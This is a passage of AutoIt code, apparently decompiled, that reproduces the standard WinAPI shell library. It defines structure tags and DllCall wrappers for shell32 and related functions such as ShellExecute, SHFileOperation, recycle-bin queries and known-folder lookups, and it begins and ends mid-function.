$TEPFI = DLLSTRUCTCREATE ("dword;dword;ulong_ptr;ulong_ptr;ulong_ptr" , $PINFO ) __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [0 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & (_WINAPI_STRLEN ($PFILE ) + 1 ) & "]" , $PFILE ) , 1 ) FOR $I = 1 TO 3 $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [$I ] = DLLSTRUCTGETDATA ($TEPFI , $I + 2 ) * $ISIZE NEXT RETURN 1 ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $TAGNOTIFYICONDATA = "struct;dword Size;hwnd hWnd;uint ID;uint Flags;uint CallbackMessage;ptr hIcon;wchar Tip[128];dword State;dword StateMask;wchar Info[256];uint Version;wchar InfoTitle[64];dword InfoFlags;endstruct" GLOBAL CONST $TAGNOTIFYICONDATA_V3 = $TAGNOTIFYICONDATA & ";" & $TAGGUID GLOBAL CONST $TAGNOTIFYICONDATA_V4 = $TAGNOTIFYICONDATA_V3 & ";ptr hBalloonIcon;" GLOBAL CONST $TAGSHELLEXECUTEINFO = "dword Size;ulong Mask;hwnd hWnd;ptr Verb;ptr File;ptr Parameters;ptr Directory;int Show;ulong_ptr hInstApp;ptr IDList;ptr Class;ulong_ptr hKeyClass;dword HotKey;ptr hMonitor;ptr hProcess" GLOBAL CONST $TAGSHFILEINFO = "ptr hIcon;int iIcon;dword Attributes;wchar DisplayName[260];wchar TypeName[80]" GLOBAL CONST $TAGSHFILEOPSTRUCT = "hwnd hWnd;uint Func;ptr From;ptr To;dword Flags;int fAnyOperationsAborted;ptr hNameMappings;ptr ProgressTitle" GLOBAL CONST $TAGSHFOLDERCUSTOMSETTINGS = "dword Size;dword Mask;ptr GUID;ptr WebViewTemplate;dword SizeWVT;ptr WebViewTemplateVersion;ptr InfoTip;dword SizeIT;ptr CLSID;dword Flags;ptr IconFile;dword SizeIF;int IconIndex;ptr Logo;dword SizeL" GLOBAL CONST $TAGSHSTOCKICONINFO = "dword Size;ptr hIcon;int SysImageIndex;int iIcon;wchar Path[260]" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_DEFSUBCLASSPROC ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "lresult" , "DefSubclassProc" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DLLGETVERSION ($SFILEPATH ) LOCAL $TVERSION = DLLSTRUCTCREATE ("dword[5]" ) DLLSTRUCTSETDATA ($TVERSION , 1 , DLLSTRUCTGETSIZE ($TVERSION ) , 1 ) LOCAL $ARET = DLLCALL ($SFILEPATH , "uint" , "DllGetVersion" , "struct*" , $TVERSION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] FOR $I = 0 TO 3 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TVERSION , 1 , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_FINDEXECUTABLE ($SFILENAME , $SDIRECTORY = "" ) LOCAL $ARESULT = DLLCALL ("shell32.dll" , "INT" , "FindExecutableW" , "wstr" , $SFILENAME , "wstr" , $SDIRECTORY , "wstr" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARESULT [0 ] <= 32 THEN RETURN SETERROR (10 , $ARESULT [0 ] , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [3 ] ) ENDFUNC FUNC _WINAPI_GETALLUSERSPROFILEDIRECTORY () LOCAL $ARET = DLLCALL ("userenv.dll" , "bool" , "GetAllUsersProfileDirectoryW" , "wstr" , "" , "dword*" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETDEFAULTUSERPROFILEDIRECTORY () LOCAL $ARET = DLLCALL ("userenv.dll" , "bool" , "GetDefaultUserProfileDirectoryW" , "wstr" , "" , "dword*" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "GetWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS , "dword_ptr*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_REMOVEWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "RemoveWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETCURRENTPROCESSEXPLICITAPPUSERMODELID ($SAPPID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SetCurrentProcessExplicitAppUserModelID" , "wstr" , $SAPPID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SETWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS , $PDATA = 0 ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "SetWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS , "dword_ptr" , $PDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLADDTORECENTDOCS ($SFILEPATH ) LOCAL $STYPEOFFILE = "wstr" IF STRINGSTRIPWS ($SFILEPATH , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $SFILEPATH = _WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH , 1 ) IF NOT $SFILEPATH THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF ELSE $STYPEOFFILE = "ptr" $SFILEPATH = 0 ENDIF DLLCALL ("shell32.dll" , "none" , "SHAddToRecentDocs" , "uint" , 3 , $STYPEOFFILE , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFY ($IEVENT , $IFLAGS , $IITEM1 = 0 , $IITEM2 = 0 ) LOCAL $STYPEOFITEM1 = "dword_ptr" , $STYPEOFITEM2 = "dword_ptr" IF ISSTRING ($IITEM1 ) THEN $STYPEOFITEM1 = "wstr" ENDIF IF ISSTRING ($IITEM2 ) THEN $STYPEOFITEM2 = "wstr" ENDIF DLLCALL ("shell32.dll" , "none" , "SHChangeNotify" , "long" , $IEVENT , "uint" , $IFLAGS , $STYPEOFITEM1 , $IITEM1 , $STYPEOFITEM2 , $IITEM2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFYDEREGISTER ($IID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHChangeNotifyDeregister" , "ulong" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFYREGISTER ($HWND , $IMSG , $IEVENTS , $ISOURCES , $APATHS , $BRECURSIVE = FALSE ) LOCAL $IPATH = $APATHS , $TAGSTRUCT = "" IF ISARRAY ($APATHS ) THEN IF UBOUND ($APATHS , $UBOUND_COLUMNS ) THEN RETURN SETERROR (1 , 0 , 0 ) ELSE DIM $APATHS [1 ] = [$IPATH ] ENDIF FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 IF NOT _WINAPI_PATHISDIRECTORY ($APATHS [$I ] ) THEN RETURN SETERROR (2 , 0 , 0 ) NEXT FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 $TAGSTRUCT &= "ptr;int;" NEXT LOCAL $TENTRY = DLLSTRUCTCREATE ($TAGSTRUCT ) FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 $APATHS [$I ] = _WINAPI_SHELLILCREATEFROMPATH (_WINAPI_PATHSEARCHANDQUALIFY ($APATHS [$I ] ) ) DLLSTRUCTSETDATA ($TENTRY , 2 * $I + 1 , $APATHS [$I ] ) DLLSTRUCTSETDATA ($TENTRY , 2 * $I + 2 , $BRECURSIVE ) NEXT LOCAL $IERROR = 0 LOCAL $ARET = DLLCALL ("shell32.dll" , "ulong" , "SHChangeNotifyRegister" , "hwnd" , $HWND , "int" , $ISOURCES , "long" , $IEVENTS , "uint" , $IMSG , "int" , UBOUND ($APATHS ) , "struct*" , $TENTRY ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 10 FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 _WINAPI_COTASKMEMFREE ($APATHS [$I ] ) NEXT RETURN SETERROR ($IERROR , 0 , $ARET [0 ] ) ENDFUNC FUNC _WINAPI_SHELLCREATEDIRECTORY ($SFILEPATH , $HPARENT = 0 , $TSECURITY = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHCreateDirectoryExW" , "hwnd" , $HPARENT , "wstr" , $SFILEPATH , "struct*" , $TSECURITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLEMPTYRECYCLEBIN ($SROOT = "" , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHEmptyRecycleBinW" , "hwnd" , $HPARENT , "wstr" , $SROOT , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLEXECUTE ($SFILEPATH , $SARGS = "" , $SDIR = "" , $SVERB = "" , $ISHOW = 1 , $HPARENT = 0 ) LOCAL $STYPEOFARGS = "wstr" , $STYPEOFDIR = "wstr" , $STYPEOFVERB = "wstr" IF NOT STRINGSTRIPWS ($SARGS , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFARGS = "ptr" $SARGS = 0 ENDIF IF NOT STRINGSTRIPWS ($SDIR , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFDIR = "ptr" $SDIR = 0 ENDIF IF NOT STRINGSTRIPWS ($SVERB , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFVERB = "ptr" $SVERB = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "ULONG_PTR" , "ShellExecuteW" , "hwnd" , $HPARENT , $STYPEOFVERB , $SVERB , "wstr" , $SFILEPATH , $STYPEOFARGS , $SARGS , $STYPEOFDIR , $SDIR , "int" , $ISHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) IF $ARET [0 ] <= 32 THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLEXECUTEEX (BYREF $TSHEXINFO ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "ShellExecuteExW" , "struct*" , $TSHEXINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLEXTRACTASSOCIATEDICON ($SFILEPATH , $BSMALL = FALSE ) LOCAL $IFLAGS = 256 IF NOT _WINAPI_PATHISDIRECTORY ($SFILEPATH ) THEN $IFLAGS = BITOR ($IFLAGS , 16 ) ENDIF IF $BSMALL THEN $IFLAGS = BITOR ($IFLAGS , 1 ) ENDIF LOCAL $TSHFILEINFO = DLLSTRUCTCREATE ($TAGSHFILEINFO ) IF NOT _WINAPI_SHELLGETFILEINFO ($SFILEPATH , $IFLAGS , 0 , $TSHFILEINFO ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TSHFILEINFO , "hIcon" ) ENDFUNC FUNC _WINAPI_SHELLEXTRACTICON ($SICON , $IINDEX , $IWIDTH , $IHEIGHT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHExtractIconsW" , "wstr" , $SICON , "int" , $IINDEX , "int" , $IWIDTH , "int" , $IHEIGHT , "ptr*" , 0 , "ptr*" , 0 , "int" , 1 , "int" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_SHELLFILEOPERATION ($SFROM , $STO , $IFUNC , $IFLAGS , $STITLE = "" , $HPARENT = 0 ) LOCAL $IDATA IF NOT ISARRAY ($SFROM ) THEN $IDATA = $SFROM DIM $SFROM [1 ] = [$IDATA ] ENDIF LOCAL $TFROM = _WINAPI_ARRAYTOSTRUCT ($SFROM ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) IF NOT ISARRAY ($STO ) THEN $IDATA = $STO DIM $STO [1 ] = [$IDATA ] ENDIF LOCAL $TTO = _WINAPI_ARRAYTOSTRUCT ($STO ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) LOCAL $TSHFILEOPSTRUCT = DLLSTRUCTCREATE ($TAGSHFILEOPSTRUCT ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "hWnd" , $HPARENT ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "Func" , $IFUNC ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "From" , DLLSTRUCTGETPTR ($TFROM ) ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "To" , DLLSTRUCTGETPTR ($TTO ) ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "ProgressTitle" , $STITLE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHFileOperationW" , "struct*" , $TSHFILEOPSTRUCT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TSHFILEOPSTRUCT ENDFUNC FUNC _WINAPI_SHELLFLUSHSFCACHE () DLLCALL ("shell32.dll" , "none" , "SHFlushSFCache" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLGETFILEINFO ($SFILEPATH , $IFLAGS , $IATTRIBUTES , BYREF $TSHFILEINFO ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword_ptr" , "SHGetFileInfoW" , "wstr" , $SFILEPATH , "dword" , $IATTRIBUTES , "struct*" , $TSHFILEINFO , "uint" , DLLSTRUCTGETSIZE ($TSHFILEINFO ) , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLGETICONOVERLAYINDEX ($SICON , $IINDEX ) LOCAL $STYPEOFICON = "wstr" IF NOT STRINGSTRIPWS ($SICON , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFICON = "ptr" $SICON = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHGetIconOverlayIndexW" , $STYPEOFICON , $SICON , "int" , $IINDEX ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLGETKNOWNFOLDERIDLIST ($SGUID , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "uint" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("shell32.dll" , "uint" , "SHGetKnownFolderIDList" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_SHELLGETKNOWNFOLDERPATH ($SGUID , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetKnownFolderPath" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $SPATH = _WINAPI_GETSTRING ($ARET [4 ] ) _WINAPI_COTASKMEMFREE ($ARET [4 ] ) RETURN $SPATH ENDFUNC FUNC _WINAPI_SHELLGETLOCALIZEDNAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetLocalizedName" , "wstr" , $SFILEPATH , "wstr" , "" , "uint*" , 0 , "int*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [2 ] LOCAL $ARET1 = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $ARET [2 ] , "wstr" , "" , "dword" , 4096 ) $ARESULT [0 ] = $ARET1 [2 ] $ARESULT [1 ] = $ARET [4 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLGETPATHFROMIDLIST ($PPIDL ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHGetPathFromIDListW" , "struct*" , $PPIDL , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLGETSETFOLDERCUSTOMSETTINGS ($SFILEPATH , $IFLAG , BYREF $TSHFCS ) LOCAL $SPROC = "SHGetSetFolderCustomSettings" IF $__WINVER < 1536 THEN $SPROC &= "W" LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , $SPROC , "struct*" , $TSHFCS , "wstr" , $SFILEPATH , "dword" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLGETSETTINGS ($IFLAGS ) LOCAL $TSHELLSTATE = DLLSTRUCTCREATE ("uint[8]" ) DLLCALL ("shell32.dll" , "none" , "SHGetSetSettings" , "struct*" , $TSHELLSTATE , "dword" , $IFLAGS , "bool" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $IVAL1 = DLLSTRUCTGETDATA ($TSHELLSTATE , 1 , 1 ) LOCAL $IVAL2 = DLLSTRUCTGETDATA ($TSHELLSTATE , 1 , 8 ) LOCAL $IRESULT = 0 LOCAL $AOPT [20 ] [2 ] = [[1 , 1 ] , [2 , 2 ] , [4 , 32768 ] , [8 , 32 ] , [16 , 8 ] , [32 , 128 ] , [64 , 512 ] , [128 , 1024 ] , [256 , 2048 ] , [1024 , 4096 ] , [2048 , 8192 ] , [4096 , 16384 ] , [8192 , 131072 ] , [32768 , 262144 ] , [65536 , 1048576 ] , [1 , 524288 ] , [2 , 2097152 ] , [8 , 8388608 ] , [16 , 16777216 ] , [32 , 33554432 ] ] FOR $I = 0 TO 14 IF BITAND ($IVAL1 , $AOPT [$I ] [0 ] ) THEN $IRESULT += $AOPT [$I ] [1 ] ENDIF NEXT FOR $I = 15 TO 19 IF BITAND ($IVAL2 , $AOPT [$I ] [0 ] ) THEN $IRESULT += $AOPT [$I ] [1 ] ENDIF NEXT RETURN $IRESULT ENDFUNC FUNC _WINAPI_SHELLGETSPECIALFOLDERLOCATION ($ICSIDL ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetSpecialFolderLocation" , "hwnd" , 0 , "int" , $ICSIDL , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_SHELLGETSPECIALFOLDERPATH ($ICSIDL , $BCREATE = FALSE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHGetSpecialFolderPathW" , "hwnd" , 0 , "wstr" , "" , "int" , $ICSIDL , "bool" , $BCREATE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLGETSTOCKICONINFO ($ISIID , $IFLAGS ) LOCAL $TSHSTOCKICONINFO = DLLSTRUCTCREATE ($TAGSHSTOCKICONINFO ) DLLSTRUCTSETDATA ($TSHSTOCKICONINFO , "Size" , DLLSTRUCTGETSIZE ($TSHSTOCKICONINFO ) ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetStockIconInfo" , "int" , $ISIID , "uint" , $IFLAGS , "struct*" , $TSHSTOCKICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TSHSTOCKICONINFO ENDFUNC FUNC _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHILCreateFromPath" , "wstr" , $SFILEPATH , "ptr*" , 0 , "dword*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLNOTIFYICON ($IMESSAGE , BYREF $TNOTIFYICONDATA ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "Shell_NotifyIconW" , "dword" , $IMESSAGE , "struct*" , $TNOTIFYICONDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLNOTIFYICONGETRECT ($HWND , $IID , $TGUID = 0 ) LOCAL $TNII = DLLSTRUCTCREATE ("dword;hwnd;uint;" & $TAGGUID ) DLLSTRUCTSETDATA ($TNII , 1 , DLLSTRUCTGETSIZE ($TNII ) ) DLLSTRUCTSETDATA ($TNII , 2 , $HWND ) DLLSTRUCTSETDATA ($TNII , 3 , $IID ) IF ISDLLSTRUCT ($TGUID ) THEN IF NOT _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TNII , 4 ) , $TGUID , 16 ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) ENDIF LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "Shell_NotifyIconGetRect" , "struct*" , $TNII , "struct*" , $TRECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_SHELLOBJECTPROPERTIES ($SFILEPATH , $ITYPE = 2 , $SPROPERTY = "" , $HPARENT = 0 ) LOCAL $STYPEOFPROPERTY = "wstr" IF NOT STRINGSTRIPWS ($SPROPERTY , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFPROPERTY = "ptr" $SPROPERTY = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHObjectProperties" , "hwnd" , $HPARENT , "dword" , $ITYPE , "wstr" , $SFILEPATH , $STYPEOFPROPERTY , $SPROPERTY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLOPENFOLDERANDSELECTITEMS ($SFILEPATH , $ANAMES = 0 , $ISTART = 0 , $IEND = + 4294967295 , $IFLAGS = 0 ) LOCAL $PPIDL , $ARET , $TPTR = 0 , $ICOUNT = 0 , $IOBJ = 0 , $IERROR = 0 $SFILEPATH = _WINAPI_PATHREMOVEBACKSLASH (_WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH ) ) IF ISARRAY ($ANAMES ) THEN IF $SFILEPATH AND NOT _WINAPI_PATHISDIRECTORY ($SFILEPATH ) THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) ENDIF $PPIDL = _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) IF NOT __CHECKERRORARRAYBOUNDS ($ANAMES , $ISTART , $IEND ) THEN $TPTR = DLLSTRUCTCREATE ("ptr[" & ($IEND - $ISTART + 1 ) & "]" ) FOR $I = $ISTART TO $IEND $ICOUNT += 1 IF $ANAMES [$I ] THEN DLLSTRUCTSETDATA ($TPTR , 1 , _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH & "\" & $ANAMES [$I ] ) , $ICOUNT ) ELSE DLLSTRUCTSETDATA ($TPTR , 1 , 0 , $ICOUNT ) ENDIF NEXT ENDIF IF _WINAPI_COINITIALIZE () THEN $IOBJ = 1 $ARET = DLLCALL ("shell32.dll" , "long" , "SHOpenFolderAndSelectItems" , "ptr" , $PPIDL , "uint" , $ICOUNT , "struct*" , $TPTR , "dword" , $IFLAGS ) IF @ERROR THEN $IERROR = @ERROR + 10 ELSE IF $ARET [0 ] THEN $IERROR = 10 ENDIF IF $IOBJ THEN _WINAPI_COUNINITIALIZE () _WINAPI_COTASKMEMFREE ($PPIDL ) FOR $I = 1 TO $ICOUNT $PPIDL = DLLSTRUCTGETDATA ($TPTR , $I ) IF $PPIDL THEN _WINAPI_COTASKMEMFREE ($PPIDL ) ENDIF NEXT IF $IERROR = 10 THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLQUERYRECYCLEBIN ($SROOT = "" ) LOCAL $TSHQRBI = DLLSTRUCTCREATE ("align 4;dword_ptr;int64;int64" ) DLLSTRUCTSETDATA ($TSHQRBI , 1 , DLLSTRUCTGETSIZE ($TSHQRBI ) ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHQueryRecycleBinW" , "wstr" , $SROOT , "struct*" , $TSHQRBI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [2 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSHQRBI , 2 ) $ARESULT [1 ] = DLLSTRUCTGETDATA ($TSHQRBI , 3 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLQUERYUSERNOTIFICATIONSTATE () LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHQueryUserNotificationState" , "uint*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_SHELLREMOVELOCALIZEDNAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHRemoveLocalizedName" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLRESTRICTED ($IRESTRICTION ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword" , "SHRestricted" , "uint" , $IRESTRICTION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 